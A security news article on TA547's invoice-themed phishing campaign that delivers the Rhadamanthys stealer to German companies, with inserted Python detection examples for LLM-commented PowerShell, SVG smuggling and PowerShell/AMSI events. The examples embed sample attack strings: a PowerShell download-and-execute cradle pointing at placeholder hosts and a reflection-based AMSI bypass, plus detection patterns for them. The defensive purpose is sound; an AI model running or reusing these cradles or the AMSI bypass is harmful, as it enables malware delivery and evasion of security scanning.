    TA547 Phishing Attack Uses Rhadamanthys Stealer to Target German Companies

April 11, 2024 · Editorial Department · Endpoint Security / Ransomware


The threat actor tracked as TA547 has targeted dozens of German organizations with an information stealer called Rhadamanthys as part of an invoice-themed phishing campaign.

“This is the first time researchers have observed TA547 using Rhadamanthys, an information stealer used by multiple cybercriminal threat actors,” Proofpoint said. “In addition, the actor appears to have used a PowerShell script that researchers suspect was generated by a large language model (LLM).”

TA547 is a prolific, financially motivated threat actor known to have been active since at least November 2017, using email phishing lures to deliver various Android and Windows malware such as ZLoader, Gootkit, DanaBot, Ursnif, and even Adhubllka ransomware.

In recent years, the group has evolved into an initial access broker (IAB) for ransomware attacks. It has also been observed employing geofencing techniques to restrict payloads to specific regions.


The emails observed in the latest campaign impersonate the German company Metro AG and carry a password-protected ZIP archive containing an LNK shortcut that, when opened, triggers the execution of a remote PowerShell script, which launches the Rhadamanthys stealer directly in memory.

Interestingly, the PowerShell script used to load Rhadamanthys includes “grammatically correct and hyper-specific comments” above each instruction in the program, raising the possibility that it was generated (or rewritten) using an LLM.
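A comment-density check and a comment-stripping normalizer, added here as an example and not drawn from Proofpoint's analysis or the page. The sample script is constructed for this example in the style described (one comment above every instruction); its URL, variable names and logic are invented and it does not reproduce the TA547 loader. The point for a defender: comments are cheap to regenerate, so hashes and string signatures should be computed over the code with the commentary removed.

```python
import hashlib
import re

# Constructed sample: a short PowerShell download cradle in the style described
# above. It is NOT the TA547 script; URL, variable names and logic are invented.
SAMPLE_SCRIPT = r"""
# Define the URL of the remote resource to download
$url = "http://example.invalid/update.ps1"
# Create a new WebClient object to perform the download
$client = New-Object System.Net.WebClient
# Download the remote script content as a string
$payload = $client.DownloadString($url)
# Execute the downloaded script in the current process
Invoke-Expression $payload
"""

_LINE_COMMENT = re.compile(r"^\s*#")
_BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def comment_profile(script: str) -> dict:
    """Count comment lines vs. code lines and report the share of code lines
    that are immediately preceded by a comment ('annotated' instructions)."""
    lines = [l for l in _BLOCK_COMMENT.sub("", script).splitlines() if l.strip()]
    comments = sum(1 for l in lines if _LINE_COMMENT.match(l))
    code = len(lines) - comments
    annotated = sum(
        1 for i in range(1, len(lines))
        if not _LINE_COMMENT.match(lines[i]) and _LINE_COMMENT.match(lines[i - 1])
    )
    return {
        "code_lines": code,
        "comment_lines": comments,
        "annotated_ratio": round(annotated / code, 2) if code else 0.0,
    }


def normalize(script: str) -> str:
    """Drop block and full-line comments, collapse whitespace and case, so a
    hash or signature tracks the logic rather than the commentary."""
    no_block = _BLOCK_COMMENT.sub("", script)
    kept = [l for l in no_block.splitlines()
            if l.strip() and not _LINE_COMMENT.match(l)]
    return re.sub(r"\s+", " ", " ".join(kept)).strip().lower()


def code_hash(script: str) -> str:
    """SHA-256 of the normalized (comment-free) script body."""
    return hashlib.sha256(normalize(script).encode()).hexdigest()


if __name__ == "__main__":
    print(comment_profile(SAMPLE_SCRIPT))
    print(code_hash(SAMPLE_SCRIPT))
```

An annotated ratio near 1.0 on a script that does nothing but download and execute is a triage signal, not a verdict; the normalized hash is what you pivot on across samples that differ only in their comments.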

Another hypothesis is that TA547 copied the script from another source that had used generative AI to create it.

“This campaign represents an example of some of TA547’s technical shifts, including the use of compressed LNKs and the previously unobserved Rhadamanthys stealer,” Proofpoint said. “It also provides insight into how threat actors are leveraging likely LLM-generated content in malware campaigns.”

The development comes as other phishing campaigns have been using uncommon tactics to facilitate credential theft. In one such campaign, recipients receive a voicemail notification and are directed to click a link to access it.

The payload retrieved from the URL is heavily obfuscated HTML that executes JavaScript embedded in an SVG image when the page is rendered on the target system.


    Binary Defense said the SVG data contained “encrypted data containing a second-stage page that prompts the target to enter credentials to access the voice message,” adding that the page was encrypted using CryptoJS.
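An added example, not Binary Defense's or the page's code, that scans HTML for the pattern just described: a script element or event-handler attribute inside an inline SVG whose body calls a CryptoJS decrypt routine or writes into the document. The sample page, its ciphertext, key and CDN URL are constructed for this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample page in the shape described above: an inline SVG whose
# script decrypts a second stage with CryptoJS and writes it into the DOM.
# Ciphertext, key and URLs are invented for this example.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example.invalid/crypto-js.min.js"></script>
</head><body>
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"
     onload="document.body.appendChild(document.createElement('div'))">
  <script>
    var e = "U2FsdGVkX1+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";
    var d = CryptoJS.AES.decrypt(e, "voicemail").toString(CryptoJS.enc.Utf8);
    document.write(d);
  </script>
</svg>
</body></html>"""

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
# Decode/decrypt/write primitives commonly used to unpack a hidden second stage.
SUSPICIOUS_CALLS = re.compile(
    r"CryptoJS\.(?:AES|TripleDES|Rabbit|RC4)\.decrypt|document\.write|eval\(|atob\(",
    re.I,
)


class SvgScriptScanner(HTMLParser):
    """Record script elements and event handlers that live inside <svg>, plus
    suspicious calls made from those script bodies."""

    def __init__(self):
        super().__init__()
        self.svg_depth = 0
        self.in_svg_script = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        if self.svg_depth:
            for name, value in attrs:
                if EVENT_ATTR.match(name) and value:
                    self.findings.append(f"svg-event-handler:{name}")
            if tag == "script":
                self.in_svg_script = True
                self.findings.append("svg-inline-script")

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1
        if tag == "script":
            self.in_svg_script = False

    def handle_data(self, data):
        # Only script text nested in an SVG is inspected; page-level scripts
        # are a different (and far noisier) signal.
        if self.in_svg_script:
            for m in SUSPICIOUS_CALLS.finditer(data):
                self.findings.append(f"svg-script-call:{m.group(0)}")


def scan_html(html: str) -> list:
    """Return the sorted, de-duplicated findings for one HTML document."""
    scanner = SvgScriptScanner()
    scanner.feed(html)
    scanner.close()
    return sorted(set(scanner.findings))


def is_svg_smuggling(html: str) -> bool:
    """Heuristic verdict: script inside an SVG that decrypts or writes content."""
    f = scan_html(html)
    return "svg-inline-script" in f and any(x.startswith("svg-script-call:") for x in f)


if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
    print(is_svg_smuggling(SAMPLE_HTML))
```

Run it over the HTML a mail gateway or proxy has already decoded; obfuscation that builds the SVG at runtime will not be visible to a static pass like this, which is why the verdict is a heuristic rather than a signature.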

Other email-based attacks have paved the way for Agent Tesla, which, according to Cofense, has become an attractive option for threat actors because it “is an affordable malware service with multiple capabilities to exfiltrate and steal users’ data.”

Social engineering campaigns have also taken the form of malvertising on search engines such as Google, luring unsuspecting users into downloading fake installers for popular software such as PuTTY, FileZilla and Room Planner, and ultimately deploying Nitrogen and IDAT Loader.


The infection chain involving IDAT Loader is noteworthy because an MSIX installer is used to launch a PowerShell script, which in turn contacts a Telegram bot to obtain a second PowerShell script hosted there.

That second script then acts as a conduit to a third PowerShell script, which is used to bypass the Windows Anti-Malware Scan Interface (AMSI) and trigger the execution of a loader that in turn loads the SectopRAT trojan.
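Detection logic, added here as an example and not drawn from Proofpoint, Malwarebytes or the page, that covers two of the chains described above: the TA547 LNK that causes explorer.exe to spawn PowerShell, which pulls a remote script and runs it in memory, and the IDAT Loader stages in which PowerShell contacts a Telegram bot and later tampers with AMSI. The Sysmon-style events, hosts, paths and URL are constructed for this example; the AMSI strings are common indicators of the reflection-based bypass and are not ones the page attributes to this campaign.

```python
import re
from typing import Iterable, Optional

# Constructed Sysmon-style events (process creation, network connection,
# PowerShell script block) modelled on the chains described above. Hosts,
# paths and the URL are invented for this example.
SAMPLE_EVENTS = [
    # LNK opened from a ZIP: explorer.exe spawns PowerShell that pulls a
    # remote script and executes it in memory.
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/inv.ps1')\""},
    # MSIX-launched PowerShell fetching its second stage from a Telegram bot.
    {"event": "network_connect",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    # Script block of a stage that disables AMSI via reflection (a common
    # public bypass pattern, used here only as sample content).
    {"event": "script_block",
     "script": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    # Benign admin activity that must not fire any rule.
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
# Download-and-execute primitives seen in in-memory cradles.
CRADLE = re.compile(
    r"IEX|Invoke-Expression|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|\bcurl\b|-enc\w*\s",
    re.I,
)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I)
# Parents a user double-click or document macro would produce.
USER_PARENTS = re.compile(r"\\(?:explorer|outlook|winword|excel)\.exe$", re.I)
AMSI_TAMPER = re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsi\.dll", re.I)
BOT_HOSTS = {"api.telegram.org"}


def rule_download_cradle(ev: dict) -> Optional[str]:
    """PowerShell with a download cradle, either hidden/policy-bypassed or
    spawned directly from a user-facing application."""
    if ev.get("event") != "process_create" or not POWERSHELL.search(ev.get("image", "")):
        return None
    cl = ev.get("command_line", "")
    if CRADLE.search(cl) and (HIDDEN.search(cl) or USER_PARENTS.search(ev.get("parent_image", ""))):
        return "powershell-remote-cradle-from-user-app"
    return None


def rule_bot_c2(ev: dict) -> Optional[str]:
    """PowerShell talking to a messaging-bot API used for staging."""
    if (ev.get("event") == "network_connect"
            and POWERSHELL.search(ev.get("image", ""))
            and ev.get("dest_host", "").lower() in BOT_HOSTS):
        return "powershell-to-messaging-bot-api"
    return None


def rule_amsi_tamper(ev: dict) -> Optional[str]:
    """Script block logging (Event ID 4104) that references AMSI internals."""
    if ev.get("event") == "script_block" and AMSI_TAMPER.search(ev.get("script", "")):
        return "amsi-tamper-in-script-block"
    return None


RULES = (rule_download_cradle, rule_bot_c2, rule_amsi_tamper)


def detect(events: Iterable[dict]) -> list:
    """Run every rule over every event and return the alert names that fired."""
    return [name for ev in events for rule in RULES if (name := rule(ev))]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The AMSI rule depends on script block logging being enabled and shipped; a bypass that succeeds before the block is logged still leaves the process-creation and network events, which is why the three rules are meant to be correlated on the same host rather than judged alone.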

    “Restricting traffic from major and lesser-known ad networks through group policies protects endpoints from malvertising,” said Jérôme Segura, principal threat researcher at Malwarebytes.
